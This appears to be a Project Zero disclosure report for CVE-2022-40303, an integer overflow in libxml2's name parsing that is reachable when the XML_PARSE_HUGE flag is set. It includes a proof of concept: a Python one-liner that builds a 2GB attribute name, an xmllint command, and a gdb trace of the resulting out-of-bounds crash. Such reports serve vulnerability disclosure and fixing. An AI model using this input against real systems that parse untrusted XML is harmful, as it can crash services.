[CVE-2022-40303] Integer overflow in xmlParseNameComplex
Libxml2 is vulnerable to an integer overflow in xmlParseNameComplex
when an attribute list has a very long name (name is >= 2**32 characters).
static const xmlChar *xmlParseNameComplex(xmlParserCtxtPtr ctxt) {
int len = 0, l;
[...]
return (xmlDictLookup(ctxt->dict, ctxt->input->cur - len, len));
}
If the name is greater than or equal to 2**32 characters, then len
overflows. The calculation for the second argument to xmlDictLookup (ctxt->input->cur - len
) will point to an address outside of the buffer such as adding 0x80000000 to cur
.
Exploiting this issue using static XML requires that the XML_PARSE_HUGE
flag is used to disable hardcoded parser limits. Though similar to Felix’s report (CVE-2022-29824) it may be possible to trigger without the flag using XSLT or xpath though I didn’t look into this.
Note: XML_PARSE_HUGE looks very brittle in general. Signed 32-bit integers are widely used as sizes/offsets throughout the codebase, a lot of the helper functions don’t handle inputs larger than 4GB correctly and fuzzers won’t trigger these edge cases. Maybe that flag should include a security warning? Some security critical projects like xmlsec enable it by default (https://github.com/lsh123/xmlsec/commit/3786af10953630cd2bb2b57ce31c575f025048a8) which seems risky.
Proof of Concept:
$ python3 -c 'print("<!DOCTYPE doc [\n<!ATTLIST src " + "a"*(0x80000000) + " IDREF #IMPLIED>")' > name_big.xml
$ ./xmllint --huge /tmp/name_big.xml
Program received signal SIGSEGV, Segmentation fault.
__strlen_evex () at ../sysdeps/x86_64/multiarch/strlen-evex.S:77
77 ../sysdeps/x86_64/multiarch/strlen-evex.S: No such file or directory.
(gdb) bt
#0 __strlen_evex () at ../sysdeps/x86_64/multiarch/strlen-evex.S:77
#1 0x00007ffff7e3a374 in xmlDictLookup (dict=0x421a50, name=0x7ffff795602e <error: Cannot access memory at address 0x7ffff795602e>, len=-2147483648)
at /usr/local/google/home/maddiestone/libxml2/dict.c:878
#2 0x00007ffff7e6607a in xmlParseNameComplex (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:3617
#3 0x00007ffff7e65395 in xmlParseName (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:3682
#4 0x00007ffff7e6f27e in xmlParseAttributeListDecl (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:6729
#5 0x00007ffff7e71a00 in xmlParseMarkupDecl (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:7754
#6 0x00007ffff7e79ed1 in xmlParseInternalSubset (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:9407
#7 0x00007ffff7e79a16 in xmlParseDocument (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:12165
#8 0x00007ffff7e819fe in xmlDoRead (ctxt=0x421750, URL=0x0, encoding=0x0, options=4784128, reuse=0)
at /usr/local/google/home/maddiestone/libxml2/parser.c:17044
#9 0x00007ffff7e81ad7 in xmlReadFile (filename=0x7fffffffdec7 "../qname_big.xml", encoding=0x0, options=4784128)
at /usr/local/google/home/maddiestone/libxml2/parser.c:17109
#10 0x000000000040a135 in parseAndPrintFile (filename=0x7fffffffdec7 "../qname_big.xml", rectxt=0x0)
at /usr/local/google/home/maddiestone/libxml2/xmllint.c:2366
#11 0x0000000000407574 in main (argc=3, argv=0x7fffffffdac8) at /usr/local/google/home/maddiestone/libxml2/xmllint.c:3757
(gdb) up
#1 0x00007ffff7e3a374 in xmlDictLookup (dict=0x421a50, name=0x7ffff795602e <error: Cannot access memory at address 0x7ffff795602e>, len=-2147483648)
at /usr/local/google/home/maddiestone/libxml2/dict.c:878
878 l = strlen((const char *) name);
(gdb) up
#2 0x00007ffff7e6607a in xmlParseNameComplex (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:3617
3617 return (xmlDictLookup(ctxt->dict, ctxt->input->cur - len, len));
(gdb) p/x len
$5 = 0x80000000
(gdb) p/x $_siginfo
$6 = {si_signo = 0xb, si_errno = 0x0, si_code = 0x1, _sifields = {_pad = {0xf795602e, 0x7fff, 0x0 <repeats 26 times>}, _kill = {si_pid = 0xf795602e,
si_uid = 0x7fff}, _timer = {si_tid = 0xf795602e, si_overrun = 0x7fff, si_sigval = {sival_int = 0x0, sival_ptr = 0x0}}, _rt = {si_pid = 0xf795602e,
si_uid = 0x7fff, si_sigval = {sival_int = 0x0, sival_ptr = 0x0}}, _sigchld = {si_pid = 0xf795602e, si_uid = 0x7fff, si_status = 0x0, si_utime = 0x0,
si_stime = 0x0}, _sigfault = {si_addr = 0x7ffff795602e, _addr_lsb = 0x0, _addr_bnd = {_lower = 0x0, _upper = 0x0}}, _sigpoll = {
si_band = 0x7ffff795602e, si_fd = 0x0}}}
(gdb) p/x ctxt->input->cur
$7 = 0x7fff7795602e
This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-10-20. For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html